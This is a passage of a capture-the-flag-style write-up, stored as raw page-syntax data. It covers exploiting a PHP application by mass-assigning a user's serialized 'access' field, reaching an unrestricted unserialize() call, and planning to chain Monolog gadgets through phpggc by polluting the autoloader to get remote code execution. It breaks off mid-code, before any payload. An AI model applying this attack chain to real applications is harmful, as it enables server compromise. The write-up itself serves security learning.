$data);\n}\n",[1268],{"type":32,"tag":63,"props":1269,"children":1270},{"__ignoreMap":7},[1271,1300,1307,1403],{"type":32,"tag":99,"props":1272,"children":1273},{"class":101,"line":102},[1274,1278,1282,1287,1291,1296],{"type":32,"tag":99,"props":1275,"children":1276},{"style":339},[1277],{"type":38,"value":527},{"type":32,"tag":99,"props":1279,"children":1280},{"style":339},[1281],{"type":38,"value":532},{"type":32,"tag":99,"props":1283,"children":1284},{"style":345},[1285],{"type":38,"value":1286}," updateUser",{"type":32,"tag":99,"props":1288,"children":1289},{"style":284},[1290],{"type":38,"value":542},{"type":32,"tag":99,"props":1292,"children":1293},{"style":545},[1294],{"type":38,"value":1295},"data",{"type":32,"tag":99,"props":1297,"children":1298},{"style":284},[1299],{"type":38,"value":553},{"type":32,"tag":99,"props":1301,"children":1302},{"class":101,"line":112},[1303],{"type":32,"tag":99,"props":1304,"children":1305},{"style":284},[1306],{"type":38,"value":361},{"type":32,"tag":99,"props":1308,"children":1309},{"class":101,"line":122},[1310,1315,1319,1323,1327,1331,1335,1340,1344,1348,1352,1356,1360,1364,1368,1373,1377,1382,1386,1391,1395,1399],{"type":32,"tag":99,"props":1311,"children":1312},{"style":126},[1313],{"type":38,"value":1314},"  
return",{"type":32,"tag":99,"props":1316,"children":1317},{"style":284},[1318],{"type":38,"value":573},{"type":32,"tag":99,"props":1320,"children":1321},{"style":576},[1322],{"type":38,"value":579},{"type":32,"tag":99,"props":1324,"children":1325},{"style":339},[1326],{"type":38,"value":584},{"type":32,"tag":99,"props":1328,"children":1329},{"style":545},[1330],{"type":38,"value":589},{"type":32,"tag":99,"props":1332,"children":1333},{"style":339},[1334],{"type":38,"value":584},{"type":32,"tag":99,"props":1336,"children":1337},{"style":345},[1338],{"type":38,"value":1339},"update",{"type":32,"tag":99,"props":1341,"children":1342},{"style":284},[1343],{"type":38,"value":374},{"type":32,"tag":99,"props":1345,"children":1346},{"style":295},[1347],{"type":38,"value":606},{"type":32,"tag":99,"props":1349,"children":1350},{"style":301},[1351],{"type":38,"value":751},{"type":32,"tag":99,"props":1353,"children":1354},{"style":295},[1355],{"type":38,"value":606},{"type":32,"tag":99,"props":1357,"children":1358},{"style":284},[1359],{"type":38,"value":620},{"type":32,"tag":99,"props":1361,"children":1362},{"style":284},[1363],{"type":38,"value":573},{"type":32,"tag":99,"props":1365,"children":1366},{"style":545},[1367],{"type":38,"value":1295},{"type":32,"tag":99,"props":1369,"children":1370},{"style":284},[1371],{"type":38,"value":1372},"[",{"type":32,"tag":99,"props":1374,"children":1375},{"style":295},[1376],{"type":38,"value":606},{"type":32,"tag":99,"props":1378,"children":1379},{"style":301},[1380],{"type":38,"value":1381},"_id",{"type":32,"tag":99,"props":1383,"children":1384},{"style":295},[1385],{"type":38,"value":606},{"type":32,"tag":99,"props":1387,"children":1388},{"style":284},[1389],{"type":38,"value":1390},"],",{"type":32,"tag":99,"props":1392,"children":1393},{"style":284},[1394],{"type":38,"value":573},{"type":32,"tag":99,"props":1396,"children":1397},{"style":545},[1398],{"type":38,"value":1295},{"type":32,"tag":99,"props":1400,"children":1401},{"style":284
},[1402],{"type":38,"value":385},{"type":32,"tag":99,"props":1404,"children":1405},{"class":101,"line":137},[1406],{"type":32,"tag":99,"props":1407,"children":1408},{"style":284},[1409],{"type":38,"value":423},{"type":32,"tag":47,"props":1411,"children":1412},{},[1413],{"type":38,"value":1414},"In this function the `$data` array is entirely attacker-controlled and is handed to `update()` without any field allow-list, so a single request can overwrite every field of a user record, including its `access` element. The `_id` used to select the target record also comes from `$data`, so the write is not even limited to our own account.\nSince `access` is stored as a PHP-serialized array, it is a safe bet that somewhere in the application this value is passed to unserialize().",{"type":32,"tag":47,"props":1416,"children":1417},{},[1418],{"type":38,"value":1419},"A user in the database has this structure:",{"type":32,"tag":85,"props":1421,"children":1422},{"lang":667},[1423],{"type":32,"tag":90,"props":1424,"children":1426},{"code":1425,"language":667,"meta":7,"className":672,"style":7},"{\n    \"_id\": 1,\n    \"username\": \"admin\",\n    \"password\": \"[REDACTED]\",\n    \"access\": \"a:4:{s:9:\\\"Dashboard\\\";b:1;s:7:\\\"Product\\\";b:1;s:5:\\\"Order\\\";b:1;s:4:\\\"User\\\";b:1;}\"\n}\n",[1427],{"type":32,"tag":63,"props":1428,"children":1429},{"__ignoreMap":7},[1430,1437,1466,1503,1540,1647],{"type":32,"tag":99,"props":1431,"children":1432},{"class":101,"line":102},[1433],{"type":32,"tag":99,"props":1434,"children":1435},{"style":284},[1436],{"type":38,"value":361},{"type":32,"tag":99,"props":1438,"children":1439},{"class":101,"line":112},[1440,1444,1448,1452,1456,1461],{"type":32,"tag":99,"props":1441,"children":1442},{"style":698},[1443],{"type":38,"value":701},{"type":32,"tag":99,"props":1445,"children":1446},{"style":704},[1447],{"type":38,"value":1381},{"type":32,"tag":99,"props":1449,"children":1450},{"style":698},[1451],{"type":38,"value":402},{"type":32,"tag":99,"props":1453,"children":1454},{"style":284},[1455],{"type":38,"value":715},{"type":32,"tag":99,"props":1457,"children":1458},{"style":377},[1459],{"type":38,"value":1460}," 
1",{"type":32,"tag":99,"props":1462,"children":1463},{"style":284},[1464],{"type":38,"value":1465},",\n",{"type":32,"tag":99,"props":1467,"children":1468},{"class":101,"line":122},[1469,1473,1478,1482,1486,1490,1495,1499],{"type":32,"tag":99,"props":1470,"children":1471},{"style":698},[1472],{"type":38,"value":701},{"type":32,"tag":99,"props":1474,"children":1475},{"style":704},[1476],{"type":38,"value":1477},"username",{"type":32,"tag":99,"props":1479,"children":1480},{"style":698},[1481],{"type":38,"value":402},{"type":32,"tag":99,"props":1483,"children":1484},{"style":284},[1485],{"type":38,"value":715},{"type":32,"tag":99,"props":1487,"children":1488},{"style":295},[1489],{"type":38,"value":746},{"type":32,"tag":99,"props":1491,"children":1492},{"style":301},[1493],{"type":38,"value":1494},"admin",{"type":32,"tag":99,"props":1496,"children":1497},{"style":295},[1498],{"type":38,"value":402},{"type":32,"tag":99,"props":1500,"children":1501},{"style":284},[1502],{"type":38,"value":1465},{"type":32,"tag":99,"props":1504,"children":1505},{"class":101,"line":137},[1506,1510,1515,1519,1523,1527,1532,1536],{"type":32,"tag":99,"props":1507,"children":1508},{"style":698},[1509],{"type":38,"value":701},{"type":32,"tag":99,"props":1511,"children":1512},{"style":704},[1513],{"type":38,"value":1514},"password",{"type":32,"tag":99,"props":1516,"children":1517},{"style":698},[1518],{"type":38,"value":402},{"type":32,"tag":99,"props":1520,"children":1521},{"style":284},[1522],{"type":38,"value":715},{"type":32,"tag":99,"props":1524,"children":1525},{"style":295},[1526],{"type":38,"value":746},{"type":32,"tag":99,"props":1528,"children":1529},{"style":301},[1530],{"type":38,"value":1531},"[REDACTED]",{"type":32,"tag":99,"props":1533,"children":1534},{"style":295},[1535],{"type":38,"value":402},{"type":32,"tag":99,"props":1537,"children":1538},{"style":284},[1539],{"type":38,"value":1465},{"type":32,"tag":99,"props":1541,"children":1542},{"class":101,"line":147},[1543,1547,1552,1
556,1560,1564,1569,1574,1579,1583,1588,1592,1597,1601,1606,1610,1615,1619,1624,1628,1633,1637,1642],{"type":32,"tag":99,"props":1544,"children":1545},{"style":698},[1546],{"type":38,"value":701},{"type":32,"tag":99,"props":1548,"children":1549},{"style":704},[1550],{"type":38,"value":1551},"access",{"type":32,"tag":99,"props":1553,"children":1554},{"style":698},[1555],{"type":38,"value":402},{"type":32,"tag":99,"props":1557,"children":1558},{"style":284},[1559],{"type":38,"value":715},{"type":32,"tag":99,"props":1561,"children":1562},{"style":295},[1563],{"type":38,"value":746},{"type":32,"tag":99,"props":1565,"children":1566},{"style":301},[1567],{"type":38,"value":1568},"a:4:{s:9:",{"type":32,"tag":99,"props":1570,"children":1571},{"style":576},[1572],{"type":38,"value":1573},"\\\"",{"type":32,"tag":99,"props":1575,"children":1576},{"style":301},[1577],{"type":38,"value":1578},"Dashboard",{"type":32,"tag":99,"props":1580,"children":1581},{"style":576},[1582],{"type":38,"value":1573},{"type":32,"tag":99,"props":1584,"children":1585},{"style":301},[1586],{"type":38,"value":1587},";b:1;s:7:",{"type":32,"tag":99,"props":1589,"children":1590},{"style":576},[1591],{"type":38,"value":1573},{"type":32,"tag":99,"props":1593,"children":1594},{"style":301},[1595],{"type":38,"value":1596},"Product",{"type":32,"tag":99,"props":1598,"children":1599},{"style":576},[1600],{"type":38,"value":1573},{"type":32,"tag":99,"props":1602,"children":1603},{"style":301},[1604],{"type":38,"value":1605},";b:1;s:5:",{"type":32,"tag":99,"props":1607,"children":1608},{"style":576},[1609],{"type":38,"value":1573},{"type":32,"tag":99,"props":1611,"children":1612},{"style":301},[1613],{"type":38,"value":1614},"Order",{"type":32,"tag":99,"props":1616,"children":1617},{"style":576},[1618],{"type":38,"value":1573},{"type":32,"tag":99,"props":1620,"children":1621},{"style":301},[1622],{"type":38,"value":1623},";b:1;s:4:",{"type":32,"tag":99,"props":1625,"children":1626},{"style":576},[1627],{"type":38,
"value":1573},{"type":32,"tag":99,"props":1629,"children":1630},{"style":301},[1631],{"type":38,"value":1632},"User",{"type":32,"tag":99,"props":1634,"children":1635},{"style":576},[1636],{"type":38,"value":1573},{"type":32,"tag":99,"props":1638,"children":1639},{"style":301},[1640],{"type":38,"value":1641},";b:1;}",{"type":32,"tag":99,"props":1643,"children":1644},{"style":295},[1645],{"type":38,"value":1646},"\"\n",{"type":32,"tag":99,"props":1648,"children":1649},{"class":101,"line":156},[1650],{"type":32,"tag":99,"props":1651,"children":1652},{"style":284},[1653],{"type":38,"value":423},{"type":32,"tag":47,"props":1655,"children":1656},{},[1657],{"type":38,"value":1658},"The access element is used to determine the user's access rights, on the back office.",{"type":32,"tag":47,"props":1660,"children":1661},{},[1662],{"type":38,"value":1663},"We can see that deserialization is not protected and is therefore susceptible to be exploited.",{"type":32,"tag":85,"props":1665,"children":1666},{"lang":510},[1667],{"type":32,"tag":90,"props":1668,"children":1670},{"code":1669,"language":510,"meta":7,"className":515,"style":7},"\u003C?php\nclass UserModel extends Model\n{\n  public function __construct()\n  {\n    parent::__construct();\n    $this->username = $_SESSION['username'] ?? '';\n    $this->email    = $_SESSION['email'] ?? '';\n    $this->access   = unserialize($_SESSION['access'] ?? 
''); // This line is vulnerable\n  }\n  ...\n",[1671],{"type":32,"tag":63,"props":1672,"children":1673},{"__ignoreMap":7},[1674,1687,1711,1718,1739,1746,1764,1833,1898,1973,1980],{"type":32,"tag":99,"props":1675,"children":1676},{"class":101,"line":102},[1677,1682],{"type":32,"tag":99,"props":1678,"children":1679},{"style":339},[1680],{"type":38,"value":1681},"\u003C?",{"type":32,"tag":99,"props":1683,"children":1684},{"style":576},[1685],{"type":38,"value":1686},"php\n",{"type":32,"tag":99,"props":1688,"children":1689},{"class":101,"line":112},[1690,1695,1701,1706],{"type":32,"tag":99,"props":1691,"children":1692},{"style":339},[1693],{"type":38,"value":1694},"class",{"type":32,"tag":99,"props":1696,"children":1698},{"style":1697},"--shiki-default:#5DA994",[1699],{"type":38,"value":1700}," UserModel",{"type":32,"tag":99,"props":1702,"children":1703},{"style":339},[1704],{"type":38,"value":1705}," extends",{"type":32,"tag":99,"props":1707,"children":1708},{"style":345},[1709],{"type":38,"value":1710}," Model\n",{"type":32,"tag":99,"props":1712,"children":1713},{"class":101,"line":122},[1714],{"type":32,"tag":99,"props":1715,"children":1716},{"style":284},[1717],{"type":38,"value":361},{"type":32,"tag":99,"props":1719,"children":1720},{"class":101,"line":137},[1721,1726,1730,1735],{"type":32,"tag":99,"props":1722,"children":1723},{"style":339},[1724],{"type":38,"value":1725},"  public",{"type":32,"tag":99,"props":1727,"children":1728},{"style":339},[1729],{"type":38,"value":532},{"type":32,"tag":99,"props":1731,"children":1732},{"style":704},[1733],{"type":38,"value":1734}," 
__construct",{"type":32,"tag":99,"props":1736,"children":1737},{"style":284},[1738],{"type":38,"value":353},{"type":32,"tag":99,"props":1740,"children":1741},{"class":101,"line":147},[1742],{"type":32,"tag":99,"props":1743,"children":1744},{"style":284},[1745],{"type":38,"value":692},{"type":32,"tag":99,"props":1747,"children":1748},{"class":101,"line":156},[1749,1754,1759],{"type":32,"tag":99,"props":1750,"children":1751},{"style":339},[1752],{"type":38,"value":1753},"    parent::",{"type":32,"tag":99,"props":1755,"children":1756},{"style":345},[1757],{"type":38,"value":1758},"__construct",{"type":32,"tag":99,"props":1760,"children":1761},{"style":284},[1762],{"type":38,"value":1763},"();\n",{"type":32,"tag":99,"props":1765,"children":1766},{"class":101,"line":170},[1767,1772,1776,1780,1784,1788,1792,1797,1801,1805,1809,1813,1818,1823,1828],{"type":32,"tag":99,"props":1768,"children":1769},{"style":284},[1770],{"type":38,"value":1771},"    $",{"type":32,"tag":99,"props":1773,"children":1774},{"style":576},[1775],{"type":38,"value":579},{"type":32,"tag":99,"props":1777,"children":1778},{"style":339},[1779],{"type":38,"value":584},{"type":32,"tag":99,"props":1781,"children":1782},{"style":545},[1783],{"type":38,"value":1477},{"type":32,"tag":99,"props":1785,"children":1786},{"style":284},[1787],{"type":38,"value":1228},{"type":32,"tag":99,"props":1789,"children":1790},{"style":284},[1791],{"type":38,"value":573},{"type":32,"tag":99,"props":1793,"children":1794},{"style":545},[1795],{"type":38,"value":1796},"_SESSION",{"type":32,"tag":99,"props":1798,"children":1799},{"style":284},[1800],{"type":38,"value":1372},{"type":32,"tag":99,"props":1802,"children":1803},{"style":295},[1804],{"type":38,"value":606},{"type":32,"tag":99,"props":1806,"children":1807},{"style":301},[1808],{"type":38,"value":1477},{"type":32,"tag":99,"props":1810,"children":1811},{"style":295},[1812],{"type":38,"value":606},{"type":32,"tag":99,"props":1814,"children":1815},{"style":284},[1816],{"typ
e":38,"value":1817},"]",{"type":32,"tag":99,"props":1819,"children":1820},{"style":339},[1821],{"type":38,"value":1822}," ??",{"type":32,"tag":99,"props":1824,"children":1825},{"style":295},[1826],{"type":38,"value":1827}," ''",{"type":32,"tag":99,"props":1829,"children":1830},{"style":284},[1831],{"type":38,"value":1832},";\n",{"type":32,"tag":99,"props":1834,"children":1835},{"class":101,"line":183},[1836,1840,1844,1848,1853,1858,1862,1866,1870,1874,1878,1882,1886,1890,1894],{"type":32,"tag":99,"props":1837,"children":1838},{"style":284},[1839],{"type":38,"value":1771},{"type":32,"tag":99,"props":1841,"children":1842},{"style":576},[1843],{"type":38,"value":579},{"type":32,"tag":99,"props":1845,"children":1846},{"style":339},[1847],{"type":38,"value":584},{"type":32,"tag":99,"props":1849,"children":1850},{"style":545},[1851],{"type":38,"value":1852},"email",{"type":32,"tag":99,"props":1854,"children":1855},{"style":284},[1856],{"type":38,"value":1857},"    =",{"type":32,"tag":99,"props":1859,"children":1860},{"style":284},[1861],{"type":38,"value":573},{"type":32,"tag":99,"props":1863,"children":1864},{"style":545},[1865],{"type":38,"value":1796},{"type":32,"tag":99,"props":1867,"children":1868},{"style":284},[1869],{"type":38,"value":1372},{"type":32,"tag":99,"props":1871,"children":1872},{"style":295},[1873],{"type":38,"value":606},{"type":32,"tag":99,"props":1875,"children":1876},{"style":301},[1877],{"type":38,"value":1852},{"type":32,"tag":99,"props":1879,"children":1880},{"style":295},[1881],{"type":38,"value":606},{"type":32,"tag":99,"props":1883,"children":1884},{"style":284},[1885],{"type":38,"value":1817},{"type":32,"tag":99,"props":1887,"children":1888},{"style":339},[1889],{"type":38,"value":1822},{"type":32,"tag":99,"props":1891,"children":1892},{"style":295},[1893],{"type":38,"value":1827},{"type":32,"tag":99,"props":1895,"children":1896},{"style":284},[1897],{"type":38,"value":1832},{"type":32,"tag":99,"props":1899,"children":1900},{"class":101,"lin
e":196},[1901,1905,1909,1913,1917,1922,1927,1931,1935,1939,1943,1947,1951,1955,1959,1963,1968],{"type":32,"tag":99,"props":1902,"children":1903},{"style":284},[1904],{"type":38,"value":1771},{"type":32,"tag":99,"props":1906,"children":1907},{"style":576},[1908],{"type":38,"value":579},{"type":32,"tag":99,"props":1910,"children":1911},{"style":339},[1912],{"type":38,"value":584},{"type":32,"tag":99,"props":1914,"children":1915},{"style":545},[1916],{"type":38,"value":1551},{"type":32,"tag":99,"props":1918,"children":1919},{"style":284},[1920],{"type":38,"value":1921},"   =",{"type":32,"tag":99,"props":1923,"children":1924},{"style":704},[1925],{"type":38,"value":1926}," unserialize",{"type":32,"tag":99,"props":1928,"children":1929},{"style":284},[1930],{"type":38,"value":542},{"type":32,"tag":99,"props":1932,"children":1933},{"style":545},[1934],{"type":38,"value":1796},{"type":32,"tag":99,"props":1936,"children":1937},{"style":284},[1938],{"type":38,"value":1372},{"type":32,"tag":99,"props":1940,"children":1941},{"style":295},[1942],{"type":38,"value":606},{"type":32,"tag":99,"props":1944,"children":1945},{"style":301},[1946],{"type":38,"value":1551},{"type":32,"tag":99,"props":1948,"children":1949},{"style":295},[1950],{"type":38,"value":606},{"type":32,"tag":99,"props":1952,"children":1953},{"style":284},[1954],{"type":38,"value":1817},{"type":32,"tag":99,"props":1956,"children":1957},{"style":339},[1958],{"type":38,"value":1822},{"type":32,"tag":99,"props":1960,"children":1961},{"style":295},[1962],{"type":38,"value":1827},{"type":32,"tag":99,"props":1964,"children":1965},{"style":284},[1966],{"type":38,"value":1967},");",{"type":32,"tag":99,"props":1969,"children":1970},{"style":116},[1971],{"type":38,"value":1972}," // This line is 
vulnerable\n",{"type":32,"tag":99,"props":1974,"children":1975},{"class":101,"line":204},[1976],{"type":32,"tag":99,"props":1977,"children":1978},{"style":284},[1979],{"type":38,"value":1100},{"type":32,"tag":99,"props":1981,"children":1982},{"class":101,"line":213},[1983],{"type":32,"tag":99,"props":1984,"children":1985},{"style":284},[1986],{"type":38,"value":1987},"  ...\n",{"type":32,"tag":47,"props":1989,"children":1990},{},[1991],{"type":32,"tag":1992,"props":1993,"children":1994},"strong",{},[1995],{"type":38,"value":1996},"What is serialization?",{"type":32,"tag":47,"props":1998,"children":1999},{},[2000],{"type":38,"value":2001},"In PHP, serialization is the process of converting a PHP object or data structure into a format that can be easily stored or transmitted. The serialized data can be stored in a file, database, or sent over a network. The serialized data can then be later retrieved and unserialized, which is the process of converting the serialized data back into its original PHP object or data structure.",{"type":32,"tag":47,"props":2003,"children":2004},{},[2005],{"type":38,"value":2006},"Example:",{"type":32,"tag":85,"props":2008,"children":2009},{"lang":510},[2010],{"type":32,"tag":90,"props":2011,"children":2013},{"code":2012,"language":510,"meta":7,"className":515,"style":7},"$data = array('name' => 'John',\n              'age' => 30,\n              'email' => 'john@example.com');\n$serialized_data = serialize($data);\n\necho 
$serialized_data;\n'a:3:{s:4:\"name\";s:4:\"John\";s:3:\"age\";i:30;s:5:\"email\";s:17:\"john@example.com\";}'\n",[2014],{"type":32,"tag":63,"props":2015,"children":2016},{"__ignoreMap":7},[2017,2078,2108,2144,2177,2184,2204],{"type":32,"tag":99,"props":2018,"children":2019},{"class":101,"line":102},[2020,2025,2029,2033,2038,2042,2046,2051,2055,2060,2065,2070,2074],{"type":32,"tag":99,"props":2021,"children":2022},{"style":284},[2023],{"type":38,"value":2024},"$",{"type":32,"tag":99,"props":2026,"children":2027},{"style":545},[2028],{"type":38,"value":1295},{"type":32,"tag":99,"props":2030,"children":2031},{"style":284},[2032],{"type":38,"value":1228},{"type":32,"tag":99,"props":2034,"children":2035},{"style":704},[2036],{"type":38,"value":2037}," array",{"type":32,"tag":99,"props":2039,"children":2040},{"style":284},[2041],{"type":38,"value":374},{"type":32,"tag":99,"props":2043,"children":2044},{"style":295},[2045],{"type":38,"value":606},{"type":32,"tag":99,"props":2047,"children":2048},{"style":301},[2049],{"type":38,"value":2050},"name",{"type":32,"tag":99,"props":2052,"children":2053},{"style":295},[2054],{"type":38,"value":606},{"type":32,"tag":99,"props":2056,"children":2057},{"style":339},[2058],{"type":38,"value":2059}," =>",{"type":32,"tag":99,"props":2061,"children":2062},{"style":295},[2063],{"type":38,"value":2064}," '",{"type":32,"tag":99,"props":2066,"children":2067},{"style":301},[2068],{"type":38,"value":2069},"John",{"type":32,"tag":99,"props":2071,"children":2072},{"style":295},[2073],{"type":38,"value":606},{"type":32,"tag":99,"props":2075,"children":2076},{"style":284},[2077],{"type":38,"value":1465},{"type":32,"tag":99,"props":2079,"children":2080},{"class":101,"line":112},[2081,2086,2091,2095,2099,2104],{"type":32,"tag":99,"props":2082,"children":2083},{"style":295},[2084],{"type":38,"value":2085},"              
'",{"type":32,"tag":99,"props":2087,"children":2088},{"style":301},[2089],{"type":38,"value":2090},"age",{"type":32,"tag":99,"props":2092,"children":2093},{"style":295},[2094],{"type":38,"value":606},{"type":32,"tag":99,"props":2096,"children":2097},{"style":339},[2098],{"type":38,"value":2059},{"type":32,"tag":99,"props":2100,"children":2101},{"style":377},[2102],{"type":38,"value":2103}," 30",{"type":32,"tag":99,"props":2105,"children":2106},{"style":284},[2107],{"type":38,"value":1465},{"type":32,"tag":99,"props":2109,"children":2110},{"class":101,"line":122},[2111,2115,2119,2123,2127,2131,2136,2140],{"type":32,"tag":99,"props":2112,"children":2113},{"style":295},[2114],{"type":38,"value":2085},{"type":32,"tag":99,"props":2116,"children":2117},{"style":301},[2118],{"type":38,"value":1852},{"type":32,"tag":99,"props":2120,"children":2121},{"style":295},[2122],{"type":38,"value":606},{"type":32,"tag":99,"props":2124,"children":2125},{"style":339},[2126],{"type":38,"value":2059},{"type":32,"tag":99,"props":2128,"children":2129},{"style":295},[2130],{"type":38,"value":2064},{"type":32,"tag":99,"props":2132,"children":2133},{"style":301},[2134],{"type":38,"value":2135},"john@example.com",{"type":32,"tag":99,"props":2137,"children":2138},{"style":295},[2139],{"type":38,"value":606},{"type":32,"tag":99,"props":2141,"children":2142},{"style":284},[2143],{"type":38,"value":385},{"type":32,"tag":99,"props":2145,"children":2146},{"class":101,"line":137},[2147,2151,2156,2160,2165,2169,2173],{"type":32,"tag":99,"props":2148,"children":2149},{"style":284},[2150],{"type":38,"value":2024},{"type":32,"tag":99,"props":2152,"children":2153},{"style":545},[2154],{"type":38,"value":2155},"serialized_data",{"type":32,"tag":99,"props":2157,"children":2158},{"style":284},[2159],{"type":38,"value":1228},{"type":32,"tag":99,"props":2161,"children":2162},{"style":704},[2163],{"type":38,"value":2164}," 
serialize",{"type":32,"tag":99,"props":2166,"children":2167},{"style":284},[2168],{"type":38,"value":542},{"type":32,"tag":99,"props":2170,"children":2171},{"style":545},[2172],{"type":38,"value":1295},{"type":32,"tag":99,"props":2174,"children":2175},{"style":284},[2176],{"type":38,"value":385},{"type":32,"tag":99,"props":2178,"children":2179},{"class":101,"line":147},[2180],{"type":32,"tag":99,"props":2181,"children":2182},{"emptyLinePlaceholder":141},[2183],{"type":38,"value":144},{"type":32,"tag":99,"props":2185,"children":2186},{"class":101,"line":156},[2187,2192,2196,2200],{"type":32,"tag":99,"props":2188,"children":2189},{"style":704},[2190],{"type":38,"value":2191},"echo",{"type":32,"tag":99,"props":2193,"children":2194},{"style":284},[2195],{"type":38,"value":573},{"type":32,"tag":99,"props":2197,"children":2198},{"style":545},[2199],{"type":38,"value":2155},{"type":32,"tag":99,"props":2201,"children":2202},{"style":284},[2203],{"type":38,"value":1832},{"type":32,"tag":99,"props":2205,"children":2206},{"class":101,"line":170},[2207,2211,2216],{"type":32,"tag":99,"props":2208,"children":2209},{"style":295},[2210],{"type":38,"value":606},{"type":32,"tag":99,"props":2212,"children":2213},{"style":301},[2214],{"type":38,"value":2215},"a:3:{s:4:\"name\";s:4:\"John\";s:3:\"age\";i:30;s:5:\"email\";s:17:\"john@example.com\";}",{"type":32,"tag":99,"props":2217,"children":2218},{"style":295},[2219],{"type":38,"value":2220},"'\n",{"type":32,"tag":47,"props":2222,"children":2223},{},[2224,2226],{"type":38,"value":2225},"If a malicious user controls the serialized string, unserialize() will instantiate whatever classes the payload names, and PHP will later run their magic methods (__wakeup, __destruct, __toString, ...), so existing application or library code can be chained into file writes or command execution. This is known as a deserialization (PHP object injection) vulnerability. In our case the string reaches unserialize() with no allowed_classes restriction, and the session value it comes from is presumably loaded from the user's access column at login (worth confirming in the login handler), which we can rewrite through updateUser. 
The most famous repo to generate payloads for deserialization vulnerabilities is ",{"type":32,"tag":651,"props":2227,"children":2230},{"href":2228,"rel":2229},"https://github.com/ambionics/phpggc",[655],[2231],{"type":38,"value":2232},"phpggc (php generic gadget chains)",{"type":32,"tag":40,"props":2234,"children":2236},{"id":2235},"php-gadgets",[2237],{"type":38,"value":2238},"PHP Gadgets",{"type":32,"tag":47,"props":2240,"children":2241},{},[2242,2244,2250],{"type":38,"value":2243},"So we can then use the ",{"type":32,"tag":651,"props":2245,"children":2247},{"href":2228,"rel":2246},[655],[2248],{"type":38,"value":2249},"phpggc",{"type":38,"value":2251}," library which allows crafting payloads exploiting the deserialization vulnerability.\nphpggc is based on the exploitation of deserialization through known libraries such as Monolog, Guzzle, Symfony, Laravel, etc.",{"type":32,"tag":47,"props":2253,"children":2254},{},[2255,2257,2262],{"type":38,"value":2256},"However, we quickly realize that the interesting libraries (in our case ",{"type":32,"tag":1992,"props":2258,"children":2259},{},[2260],{"type":38,"value":2261},"Monolog",{"type":38,"value":2263},") are located in the frontend part, while our unserialization is performed in the backend part.\nTherefore, it is currently impossible for us to load the frontend libraries.",{"type":32,"tag":40,"props":2265,"children":2267},{"id":2266},"autoload",[2268],{"type":38,"value":2269},"Autoload",{"type":32,"tag":47,"props":2271,"children":2272},{},[2273,2275,2282],{"type":38,"value":2274},"For this part we based our work on ",{"type":32,"tag":651,"props":2276,"children":2279},{"href":2277,"rel":2278},"https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable",[655],[2280],{"type":38,"value":2281},"this article",{"type":38,"value":2283},".",{"type":32,"tag":47,"props":2285,"children":2286},{},[2287],{"type":38,"value":2288},"With this deserialization, we can pollute the backend's autoloader to include the 
frontend's autoloader, which makes the frontend's vendor classes (the Monolog gadgets) loadable from the backend and turns the unserialize() call into an RCE.",{"type":32,"tag":47,"props":2290,"children":2291},{},[2292],{"type":38,"value":2293},"Here is the reaction of my team when I said that on discord 😂",{"type":32,"tag":466,"props":2295,"children":2297},{"width":468,"src":2296},"https://user-images.githubusercontent.com/28403617/227541758-87dcc953-7467-445c-9ed0-1d6bc81ff7e4.png",[],{"type":32,"tag":47,"props":2299,"children":2300},{},[2301],{"type":32,"tag":1992,"props":2302,"children":2303},{},[2304],{"type":38,"value":2305},"What is the autoload function ?",{"type":32,"tag":47,"props":2307,"children":2308},{},[2309],{"type":38,"value":2310},"In PHP, \"Autoload\" refers to the automatic loading of PHP classes as needed, without having to manually include the class files. Once the Autoloader function has located the file, it includes it, and the class becomes available for use in the current script. The Autoload mechanism helps to reduce the amount of code you need to write, by automatically loading classes as needed, so you don't have to include them manually in every script. It also simplifies the task of managing dependencies between classes, by allowing you to organize your code into logical namespaces and directories.",{"type":32,"tag":47,"props":2312,"children":2313},{},[2314],{"type":38,"value":2315},"The idea is clear. To make it work we need to analyze the callback passed to spl_autoload_register in the backend's index.php, because unserialize() invokes that callback for every class name in the payload that is not yet loaded: the class name is therefore attacker-controlled input to the autoloader.",{"type":32,"tag":47,"props":2317,"children":2318},{},[2319],{"type":38,"value":2320},"spl_autoload_register is a built-in PHP function that registers one or more callbacks to be invoked, with the class name as argument, whenever code references a class that is not yet defined. 
So it's used for including local classes (not for classes from vendor folder).",{"type":32,"tag":85,"props":2322,"children":2323},{"land":510},[2324],{"type":32,"tag":90,"props":2325,"children":2327},{"code":2326,"language":510,"meta":7,"className":515,"style":7},"spl_autoload_register(function ($name) {\n    if (preg_match('/Controller$/', $name)) {\n        $name = \"controllers/${name}\";\n    } elseif (preg_match('/Model$/', $name)) {\n        $name = \"models/${name}\";\n    } elseif (preg_match('/_/', $name)) {\n        $name = preg_replace('/_/', '/', $name);\n    }\n\n    $filename = \"/${name}.php\";\n\n    if (file_exists($filename)) {\n        require $filename;\n    }\n    elseif (file_exists(__DIR__ . $filename)) {\n        require __DIR__ . $filename;\n    }\n});\n",[2328],{"type":32,"tag":63,"props":2329,"children":2330},{"__ignoreMap":7},[2331,2366,2429,2476,2538,2582,2638,2707,2714,2721,2770,2777,2809,2829,2836,2882,2911,2919],{"type":32,"tag":99,"props":2332,"children":2333},{"class":101,"line":102},[2334,2339,2343,2348,2353,2357,2362],{"type":32,"tag":99,"props":2335,"children":2336},{"style":704},[2337],{"type":38,"value":2338},"spl_autoload_register",{"type":32,"tag":99,"props":2340,"children":2341},{"style":284},[2342],{"type":38,"value":374},{"type":32,"tag":99,"props":2344,"children":2345},{"style":339},[2346],{"type":38,"value":2347},"function",{"type":32,"tag":99,"props":2349,"children":2350},{"style":284},[2351],{"type":38,"value":2352}," 
($",{"type":32,"tag":99,"props":2354,"children":2355},{"style":545},[2356],{"type":38,"value":2050},{"type":32,"tag":99,"props":2358,"children":2359},{"style":284},[2360],{"type":38,"value":2361},")",{"type":32,"tag":99,"props":2363,"children":2364},{"style":284},[2365],{"type":38,"value":720},{"type":32,"tag":99,"props":2367,"children":2368},{"class":101,"line":112},[2369,2374,2379,2384,2388,2393,2399,2403,2408,2412,2416,2420,2425],{"type":32,"tag":99,"props":2370,"children":2371},{"style":126},[2372],{"type":38,"value":2373},"    if",{"type":32,"tag":99,"props":2375,"children":2376},{"style":284},[2377],{"type":38,"value":2378}," 